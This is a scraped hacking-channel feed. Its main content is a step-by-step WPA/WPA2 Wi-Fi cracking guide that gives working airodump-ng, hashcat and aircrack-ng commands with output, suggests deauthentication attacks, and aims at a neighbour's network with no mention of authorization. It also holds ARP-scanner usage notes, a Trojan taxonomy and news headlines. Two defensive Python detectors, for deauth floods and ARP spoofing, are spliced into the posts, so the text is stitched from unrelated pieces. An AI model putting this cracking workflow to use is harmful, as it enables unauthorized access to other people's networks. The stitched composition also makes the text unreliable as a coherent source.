UNDERCODE COMMUNITY
🦑 Undercode World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE


✨ Youtube.com/Undercode
by Undercode.help
Forwarded from UNDERCODE NEWS
At least 2 Xbox masterpieces that were not yet announced in 2021 will be open to Microsoft.
#Technologies
Forwarded from UNDERCODER
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat:

Begin by listing wireless interfaces that support monitor mode with:

A) airmon-ng
If you do not see an interface listed then your wireless card does not support monitor mode 😞

We will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:

airmon-ng start wlan0
Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).

B) Find Your Target
Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:

airodump-ng mon0
You should see output similar to what is below.


C) Capture a 4-way Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airodump-ng to monitor traffic on the target network using the channel and BSSID values discovered with the previous command.
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS

D) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.

If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect by sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
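The deauthentication frames mentioned above are unauthenticated management frames, which is why they can be spoofed and also why a flood of them is easy to spot from the defender's side. The following is an added example (not code from the original post or from the aircrack-ng project): it parses raw IEEE 802.11 management frame headers with the standard library only and raises one alert when a single BSSID emits a threshold number of deauth/disassoc frames inside a sliding time window. The BSSID, timestamps and frames are constructed in-line; a real deployment would feed frames from a monitor-mode capture into the same feed() method.

```python
"""Added example: a defender-side detector for deauthentication floods.
Parses raw IEEE 802.11 management frame headers and alerts once when one
BSSID sends >= threshold deauth/disassoc frames inside a sliding window.
All frames below are constructed for the demo."""
import struct
from collections import defaultdict, deque
from typing import Optional

MGMT_TYPE = 0            # frame control "type" field value for management frames
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12


def mac_to_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))


def parse_80211_header(frame: bytes) -> Optional[dict]:
    """Decode the 24-byte management header; return None for anything that is not one."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if fc0 & 0x03 != 0:                  # protocol version must be 0
        return None
    ftype = (fc0 >> 2) & 0x03
    subtype = (fc0 >> 4) & 0x0F
    hdr = {
        "type": ftype,
        "subtype": subtype,
        "addr1": mac_to_str(frame[4:10]),     # receiver address
        "addr2": mac_to_str(frame[10:16]),    # transmitter address
        "bssid": mac_to_str(frame[16:22]),    # addr3 carries the BSSID in management frames
        "reason": None,
    }
    # Deauth and disassoc bodies begin with a 2-byte little-endian reason code.
    if ftype == MGMT_TYPE and subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(frame) >= 26:
        hdr["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return hdr


class DeauthFloodDetector:
    """Sliding-window count of deauth/disassoc frames per BSSID."""

    def __init__(self, window_s: float = 1.0, threshold: int = 5):
        self.window_s = window_s
        self.threshold = threshold
        self._seen = defaultdict(deque)      # bssid -> timestamps still inside the window

    def feed(self, ts: float, frame: bytes) -> Optional[dict]:
        """Return an alert dict the moment the threshold is crossed, else None."""
        hdr = parse_80211_header(frame)
        if hdr is None or hdr["type"] != MGMT_TYPE:
            return None
        if hdr["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            return None
        q = self._seen[hdr["bssid"]]
        q.append(ts)
        while q and ts - q[0] > self.window_s:
            q.popleft()
        if len(q) == self.threshold:         # fire exactly once as the threshold is crossed
            return {"bssid": hdr["bssid"], "count": len(q),
                    "window_s": self.window_s, "reason": hdr["reason"]}
        return None


def build_mgmt_frame(subtype: int, addr1: str, addr2: str, bssid: str,
                     reason: Optional[int] = None) -> bytes:
    """Constructed test frame: frame control, duration, addr1..3, sequence control, body."""
    fc0 = (subtype << 4) | (MGMT_TYPE << 2)
    frame = struct.pack("<BBH", fc0, 0, 0)
    frame += mac_to_bytes(addr1) + mac_to_bytes(addr2) + mac_to_bytes(bssid)
    frame += struct.pack("<H", 0)
    if reason is not None:
        frame += struct.pack("<H", reason)
    return frame


def run_demo() -> list:
    """Replay constructed traffic: three beacons, then eight broadcast deauths in 350 ms."""
    ap = "02:00:00:00:00:01"                 # constructed, locally administered BSSID
    bcast = "ff:ff:ff:ff:ff:ff"
    det = DeauthFloodDetector(window_s=1.0, threshold=5)
    alerts = []
    for i in range(3):                       # normal beacons, 100 ms apart
        a = det.feed(0.1 * i, build_mgmt_frame(SUBTYPE_BEACON, bcast, ap, ap))
        alerts += [a] if a else []
    for i in range(8):                       # reason 7: class 3 frame from a nonassociated STA
        a = det.feed(1.0 + 0.05 * i, build_mgmt_frame(SUBTYPE_DEAUTH, bcast, ap, ap, reason=7))
        alerts += [a] if a else []
    return alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

The detector keys on addr3 (the BSSID) rather than on the transmitter address because a spoofed deauth copies the AP's address into both fields; the window and threshold are tunable, and the single-fire rule keeps a sustained flood from producing one alert per frame.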

E) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:

mv ./-01.cap hackme.cap
Crack the Network Password

F) The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.

Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.

G) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.

cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:

# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
Where the last two fields separated by : are the network name and password respectively.

If you would like to use hashcat without naive-hashcat see this page for info.

H) Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file.

# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note that if the network password is not in the wordlist you will not crack the password.

# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.

Aircrack-ng 1.2 beta3


[00:01:49] 111040 keys tested (1017.96 k/s)


KEY FOUND! [ hacktheplanet ]


Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E

Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21

EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

References: github, Ru foro
▁ ▂ ▄ UnderCode ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
From 164 stores, Google deletes malicious ad campaigns.
#Malwares
Forwarded from UNDERCODE NEWS
The distinction between personal and corporate data is gradually disappearing.
#CyberAttacks
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 Python Scapy tools developed for LAN tests and advanced reconnaissance:

INSTALLATION & RUN:

1) pip3 install scapy

2) pip3 install netaddr

3) git clone https://github.com/peppelinux/pyLAN-tools.git

4) Usage: arpscan.py [-h] -i I [-r R [R ...]] [-t T]
[-exclude EXCLUDE [EXCLUDE ...]] [-only ONLY [ONLY ...]]
[-debug]


5) arpscan usage examples

# scans only selected peers in the local network reachable on the eth2 interface
python2 arpscan.py -i eth2 -t 0.01 -only 1 2 3 4 5 6 7 8 9 10 50 150 200 250 251 252 253 254
10.21.0.75 bc:5f:f4:f4:d0:d9 (eth2)
10.21.0.254 d4:ca:6d:e6:6a:d7

# scans only selected networks
python2 arpscan.py -i eth2 -t 0.01 -r 192.168.0.0/24 192.168.1.0/24 172.17.0.0/12
192.168.1.1 08:00:27:7c:f9:41

6) arpscan todo
parallelization with a subprocess per -r LAN (performance improvement)
choose a number of workers, each delegated a subset of addresses (address_pool/num_workers)
vendor database integration and representation (as netdiscover already does)
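The arpscan examples above work by sending ARP requests for chosen hosts (the -only numbers are host offsets inside the -r network) and recording who replies. The following is an added example, not part of pyLAN-tools, that shows the same ARP-level mechanics from a defender's side using only the standard library: it expands an arpscan-style -only list against a network, decodes raw Ethernet/ARP reply frames, builds an IP-to-MAC inventory and flags any IP answered by more than one MAC, the classic sign of ARP spoofing on the segment. Every frame and address below is constructed for the demo; in practice the frames would come from a raw socket or a pcap file.

```python
"""Added example (not part of pyLAN-tools): ARP reply parsing, arpscan-style target
expansion and an IP -> MAC inventory that flags duplicate claims for one address.
All frames and addresses are constructed for the demo."""
import ipaddress
import struct
from collections import defaultdict
from typing import Dict, List, Optional, Set

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def expand_targets(cidr: str, only: List[int]) -> List[str]:
    """Mimic '-r <cidr> -only <host numbers>': host offsets inside the network."""
    net = ipaddress.ip_network(cidr, strict=False)
    targets = []
    for n in only:
        if 0 < n < net.num_addresses - 1:      # skip the network and broadcast addresses
            targets.append(str(net.network_address + n))
    return targets


def mac_to_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_arp(frame: bytes) -> Optional[dict]:
    """Decode Ethernet II + ARP for IPv4 over Ethernet; None for anything else."""
    if len(frame) < 42:
        return None
    if struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack_from("!HHBBH", frame, 14)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": oper,
        "sender_mac": mac_to_str(frame[22:28]),
        "sender_ip": str(ipaddress.IPv4Address(frame[28:32])),
        "target_mac": mac_to_str(frame[32:38]),
        "target_ip": str(ipaddress.IPv4Address(frame[38:42])),
    }


def build_inventory(frames: List[bytes]) -> Dict[str, Set[str]]:
    """IP -> set of MACs that claimed it in ARP replies (what an arpscan prints)."""
    inv: Dict[str, Set[str]] = defaultdict(set)
    for f in frames:
        arp = parse_arp(f)
        if arp and arp["op"] == ARP_REPLY:
            inv[arp["sender_ip"]].add(arp["sender_mac"])
    return dict(inv)


def find_conflicts(inventory: Dict[str, Set[str]]) -> List[str]:
    """IPs claimed by more than one MAC, sorted for stable output."""
    return sorted(ip for ip, macs in inventory.items() if len(macs) > 1)


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Constructed test frame in the same layout a NIC would deliver."""
    smac = bytes(int(p, 16) for p in sender_mac.split(":"))
    tmac = bytes(int(p, 16) for p in target_mac.split(":"))
    eth = tmac + smac + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += smac + ipaddress.IPv4Address(sender_ip).packed
    arp += tmac + ipaddress.IPv4Address(target_ip).packed
    return eth + arp


def run_demo() -> List[str]:
    """Replies for two hosts plus a second MAC answering for the gateway address."""
    scanner_mac, scanner_ip = "02:00:00:00:00:01", "10.21.0.10"    # constructed
    frames = [
        build_arp_reply("02:00:00:00:00:75", "10.21.0.75", scanner_mac, scanner_ip),
        build_arp_reply("02:00:00:00:00:fe", "10.21.0.254", scanner_mac, scanner_ip),
        build_arp_reply("02:00:00:00:00:ee", "10.21.0.254", scanner_mac, scanner_ip),
        b"\x00" * 60,                                                  # non-ARP noise
    ]
    return find_conflicts(build_inventory(frames))


if __name__ == "__main__":
    print(expand_targets("10.21.0.0/24", [1, 2, 254]))
    print(run_demo())
```

Run periodically against a capture of the segment, the inventory doubles as a baseline: a new MAC appearing for a known gateway IP is worth an alert well before any traffic is redirected.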

▁ ▂ ▄ UnderCode ▄ ▂ ▁
Forwarded from DailyCVE
🔵 Unpatched WPS Office has a denial of service vulnerability (DC 213-2021)

https://dailycve.com/wps-office-has-denial-service-vulnerability-0
Forwarded from UNDERCODE NEWS
Apple drops exclusive features from its own software that it has illegally inserted as public sentiment deteriorates.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
Top Malware detected since 1 January 2021 till now.
#Malwares
▁ ▂ ▄ UnderCode ▄ ▂ ▁

🦑 Trojan Horse Programs

(1) Blackmail Trojan

This type of Trojan will encrypt, destroy, modify, copy, lock, and delete data. This type of Trojan uses the data in the user's system as a condition of extortion and releases it after the user pays the ransom.

(2) Mail-Finder Trojan

The task of this type of Trojan is to find all email contacts in its target email client. The Trojan can send the list to its creator. In some cases, the Trojan forwards itself to these contacts through phishing emails without the victim's knowledge, thereby self-propagating.

(3) Fake anti-virus Trojan horse

Such Trojans will send false messages to users informing them that their devices have been infected with viruses. Sometimes complex reports and scan results are used to show a high level of threat, making users panic. Then, the Trojan horse author charges users for virus removal services.

(4) Download Trojan

The purpose of this type of Trojan is to download other malware from the Internet without the device owner’s knowledge.

(5) Botnet Trojan

Botnet Trojan horses are used to damage web browsers, infect other devices, force them to join the botnet army, and execute various cyber crimes.

(6) Backdoor/remote access Trojan

This type of Trojan allows cybercriminals to remotely access and control the compromised device, for example to:

Access and modify files;

Restart the target system;

Install or uninstall other software;

Send and receive information with other connected IoT devices;

Get many other similar privileges.

(7) Spy Trojan

This type of Trojan, also known as spyware, monitors user behavior, such as surfing the Internet and what users type on websites and devices (such as personal information, financial data, login credentials, etc.). This information will then be used to perform identity theft crimes, financial fraud or ransomware attacks.

(don't copy any tutorial)
▁ ▂ ▄ UnderCode ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
German privacy agency reported that an online laptop and electronics store was fined EUR 10.4 million for staff control in breach of GDPR.
#International
Forwarded from UNDERCODE NEWS
Without its ultra-fast Optane memory, Intel would leave users without.
#Technologies